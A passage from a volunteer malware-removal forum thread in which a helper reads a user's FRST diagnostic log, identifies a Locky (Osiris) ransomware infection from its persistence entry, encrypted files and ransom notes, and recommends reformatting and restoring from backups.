FirewallRules: [TCP Query User{351DB455-463F-4ED0-B54E-8CBBE36D73EA}C:\program files (x86)\palm\hotsync.exe] => C:\program files (x86)\palm\hotsync.exe
FirewallRules: [UDP Query User{8CE0FFEF-EA34-42D8-83E1-A0B5B4C29D61}C:\program files (x86)\palm\hotsync.exe] => C:\program files (x86)\palm\hotsync.exe
FirewallRules: [{9636B7DA-DE75-4A31-9951-768DFF9B37CD}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{A4172512-EBBA-4839-99C6-6B4BBFB38DF1}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{27DBD4D5-5881-4958-B64D-C94F93A33CF3}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{C649A552-11DC-4774-966A-8C7C2AFA80A9}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{00C3FF2E-D757-425A-8B92-D0D0B281D7E7}] => C:\Program Files (x86)\AVG\AVG2014\avgmfapx.exe
FirewallRules: [{AD8FB98A-0D6E-41BB-B2CB-5DF2D3705A61}] => C:\Program Files (x86)\AVG\AVG2014\avgmfapx.exe
FirewallRules: [{45E3D5D8-1791-4E15-868E-3223AA921CE7}] => C:\Users\Karen Laptop\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{8746EE31-195A-4321-857A-5212D3CA3DED}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

15-08-2016 15:28:38 HPSF Restore Point
22-08-2016 17:04:44 Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501
28-08-2016 09:31:20 Removed Blio.
28-08-2016 09:33:27 Removed Blio.
28-08-2016 09:37:52 Removed Rosetta Stone Version 3
13-09-2016 06:46:58 HPSF Restore Point
13-11-2016 09:06:29 HPSF Restore Point
21-01-2017 10:29:26 HPSF Restore Point

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (01/22/2017 01:05:38 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program FRST64.exe version 22.1.2017.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 1d30

Start Time: 01d274f307f5da93

Termination Time: 19

Application Path: C:\Users\Karen Laptop\Downloads\FRST64.exe

Report Id:

Error: (01/22/2017 07:48:56 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/21/2017 09:54:07 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/18/2017 06:50:37 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/03/2017 04:39:11 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 15881

Error: (01/03/2017 04:39:11 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 15881

Error: (01/03/2017 03:54:23 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (01/03/2017 03:40:53 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/03/2017 02:58:03 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 142773

Error: (01/03/2017 02:58:03 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 142773


System errors:
=============
Error: (01/21/2017 11:09:32 AM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the Wlansvc service.

Error: (01/06/2017 07:39:07 AM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.233.3735.0

Update Source: Microsoft Update Server

Update Stage: Search

Source Path: http://www.microsoft.com

Signature Type: AntiVirus

Update Type: Full

User: NT AUTHORITY\SYSTEM

Current Engine Version:

Previous Engine Version: 1.1.13303.0

Error code: 0x8024001e

Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support.

Error: (01/03/2017 01:45:15 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the HPWMISVC service.

Error: (01/02/2017 08:06:53 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.233.3735.0

Update Source: Microsoft Update Server

Update Stage: Search

Source Path: http://www.microsoft.com

Signature Type: AntiVirus

Update Type: Full

User: NT AUTHORITY\SYSTEM

Current Engine Version:

Previous Engine Version: 1.1.13303.0

Error code: 0x8024001e

Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support.

Error: (01/01/2017 06:43:06 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.233.3735.0

Update Source: Microsoft Malware Protection Center

Update Stage: Search

Source Path: http://go.microsoft.com/fwlink/?LinkID= ... 752CCA7094

Signature Type: AntiSpyware

Update Type: Full

User: NT AUTHORITY\NETWORK SERVICE

Current Engine Version:

Previous Engine Version: 1.1.13303.0

Error code: 0x80072ee2

Error description: The operation timed out

Error: (01/01/2017 06:43:06 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.233.3735.0

Update Source: Microsoft Malware Protection Center

Update Stage: Search

Source Path: http://go.microsoft.com/fwlink/?LinkID= ... 752CCA7094

Signature Type: AntiVirus

Update Type: Full

User: NT AUTHORITY\NETWORK SERVICE

Current Engine Version:

Previous Engine Version: 1.1.13303.0

Error code: 0x80072ee2

Error description: The operation timed out

Error: (01/01/2017 06:43:06 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.233.3735.0

Update Source: Microsoft Malware Protection Center

Update Stage: Search

Source Path: http://go.microsoft.com/fwlink/?LinkID= ... 752CCA7094

Signature Type: AntiSpyware

Update Type: Full

User: NT AUTHORITY\NETWORK SERVICE

Current Engine Version:

Previous Engine Version: 1.1.13303.0

Error code: 0x80072ee2

Error description: The operation timed out

Error: (01/01/2017 06:43:06 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.233.3735.0

Update Source: Microsoft Malware Protection Center

Update Stage: Search

Source Path: http://go.microsoft.com/fwlink/?LinkID= ... 752CCA7094

Signature Type: AntiVirus

Update Type: Full

User: NT AUTHORITY\NETWORK SERVICE

Current Engine Version:

Previous Engine Version: 1.1.13303.0

Error code: 0x80072ee2

Error description: The operation timed out

Error: (12/27/2016 05:03:02 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.233.3338.0

Update Source: Microsoft Update Server

Update Stage: Search

Source Path: http://www.microsoft.com

Signature Type: AntiVirus

Update Type: Full

User: NT AUTHORITY\SYSTEM

Current Engine Version:

Previous Engine Version: 1.1.13303.0

Error code: 0x8024001e

Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support.

Error: (12/26/2016 06:20:53 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Microsoft Antimalware has encountered an error trying to update signatures.

New Signature Version:

Previous Signature Version: 1.233.3338.0

Update Source: Microsoft Update Server

Update Stage: Search

Source Path: http://www.microsoft.com

Signature Type: AntiVirus

Update Type: Full

User: NT AUTHORITY\SYSTEM

Current Engine Version:

Previous Engine Version: 1.1.13303.0

Error code: 0x8024001e

Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i3-2350M CPU @ 2.30GHz
Percentage of memory in use: 74%
Total physical RAM: 4043.86 MB
Available physical RAM: 1046.41 MB
Total Virtual: 8085.9 MB
Available Virtual: 4525.39 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:441.63 GB) (Free:361.77 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (Recovery) (Fixed) (Total:19.97 GB) (Free:2.16 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: (HP_TOOLS) (Fixed) (Total:3.96 GB) (Free:1.08 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: E861ED1B)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=441.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=20 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=4 GB) - (Type=0C)

==================== End of Addition.txt ============================
kmorod
Active Member
 
Posts: 5
Joined: January 22nd, 2017, 4:15 pm
Advertisement
Register to Remove

Re: OSIRIS

Unread postby Gary R » January 24th, 2017, 2:25 am

As far as I'm aware, there is as yet no way to recover files encrypted by Locky (Osiris).

If you are lucky enough to have a set of uninfected backups of your files, what I strongly suggest you do, is to reformat your hard drive and re-install Windows, which will remove all the Locky infection, and then re-install your backed up files.

We can of course attempt to help you clean your computer of infection signs, so that you can then install your backed up files, but IMO that is a far less secure option, and if we were to miss removing some part of your infection, it could well re-infect your machine and possibly your backed up files as well when you connect them to your computer to transfer them. If it were my computer I would not take that risk.

For further information on Locky (Osiris) please read ...

https://www.bleepingcomputer.com/news/s ... extension/
https://www.bleepingcomputer.com/forums ... tionshtml/

Please let me know how you'd like to proceed.

If you choose to reformat, there are programs we can recommend to help prevent you getting infected in this way again.
User avatar
Gary R
Administrator
Administrator
 
Posts: 25888
Joined: June 28th, 2005, 11:36 am
Location: Yorkshire

Re: OSIRIS

Unread postby kmorod » January 24th, 2017, 11:11 am

Thank you
From the log that was sent do you agree that what has corrupted my files is the OSIRIS virus?

Is there a way of knowing if my backup files are infected?

Thanks again for the help.
kmorod
Active Member
 
Posts: 5
Joined: January 22nd, 2017, 4:15 pm

Re: OSIRIS

Unread postby Gary R » January 24th, 2017, 12:21 pm

The following indications would strongly suggest that you have an Osiris infection ...

HKU\S-1-5-21-3553682965-2478827086-665785291-1000\...\Run: [*basllntrba<*>] => "C:\Users\Karen Laptop\AppData\Local\910c7\e8bd5.bat" <===== ATTENTION (Value Name with invalid characters)

2017-01-22 07:53 - 2017-01-22 07:53 - 00163652 _____ C:\Users\Karen Laptop\Documents\B25EF752--AD38--B401--80219FB4--9BBECE30BBA0.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00058692 _____ C:\Users\Karen Laptop\Desktop\B25EF752--AD38--B401--9E950C1E--192F8B3A905A.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00047059 _____ C:\Users\Karen Laptop\Documents\B25EF752--AD38--B401--B060E460--C1AC71CF5152.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00034628 _____ C:\Users\Karen Laptop\Desktop\B25EF752--AD38--B401--94F96ECD--7F70878AC416.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00026948 _____ C:\Users\Karen Laptop\Documents\B25EF752--AD38--B401--F1AC1582--EE92E9E668FA.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00015950 _____ C:\Users\Karen Laptop\Documents\B25EF752--AD38--B401--9D27223D--D189627EAC64.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00014292 _____ C:\Users\Karen Laptop\Desktop\B25EF752--AD38--B401--B89F2E61--0B6490683E26.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00012486 _____ C:\Users\Karen Laptop\Documents\B25EF752--AD38--B401--22C0AAD2--FBCD5FCB8A18.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00011868 _____ C:\Users\Karen Laptop\Desktop\B25EF752--AD38--B401--33C305DF--B31BB3D3BB33.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00011709 _____ C:\Users\Karen Laptop\Desktop\B25EF752--AD38--B401--734137D2--1A6CFE3C6325.osiris
2017-01-22 07:53 - 2017-01-22 07:53 - 00009610 _____ C:\Users\Karen Laptop\Documents\OSIRIS-35c4.htm
2017-01-22 07:53 - 2017-01-22 07:53 - 00009610 _____ C:\Users\Karen Laptop\Desktop\OSIRIS-2a43.htm
2017-01-22 07:52 - 2017-01-22 07:52 - 00000000 ____D C:\Users\Karen Laptop\AppData\Local\910c7

If you wish to make further checks, then visit ... https://id-ransomware.malwarehunterteam.com/ ... and ... https://www.nomoreransom.org/

Also please read ... https://www.bleepingcomputer.com/virus- ... p#discover ... which will give you a bit more information on Locky in general.

As far as checking your backed up files goes, you need to scan them before they are installed on a clean machine, however you won't be able to do that until your existing machine is free from infection.
User avatar
Gary R
Administrator
Administrator
 
Posts: 25888
Joined: June 28th, 2005, 11:36 am
Location: Yorkshire

Re: OSIRIS

Unread postby kmorod » January 24th, 2017, 12:59 pm

Thank you
kmorod
Active Member
 
Posts: 5
Joined: January 22nd, 2017, 4:15 pm
Advertisement
Register to Remove


Return to Infected? Virus, malware, adware, ransomware, oh my!



Who is online

Users browsing this forum: No registered users and 297 guests

Contact us:

Advertisements do not imply our endorsement of that product or service. Register to remove all ads. The forum is run by volunteers who donate their time and expertise. We make every attempt to ensure that the help and advice posted is accurate and will not cause harm to your computer. However, we do not guarantee that they are accurate and they are to be used at your own risk. All trademarks are the property of their respective owners.

Member site: UNITE Against Malware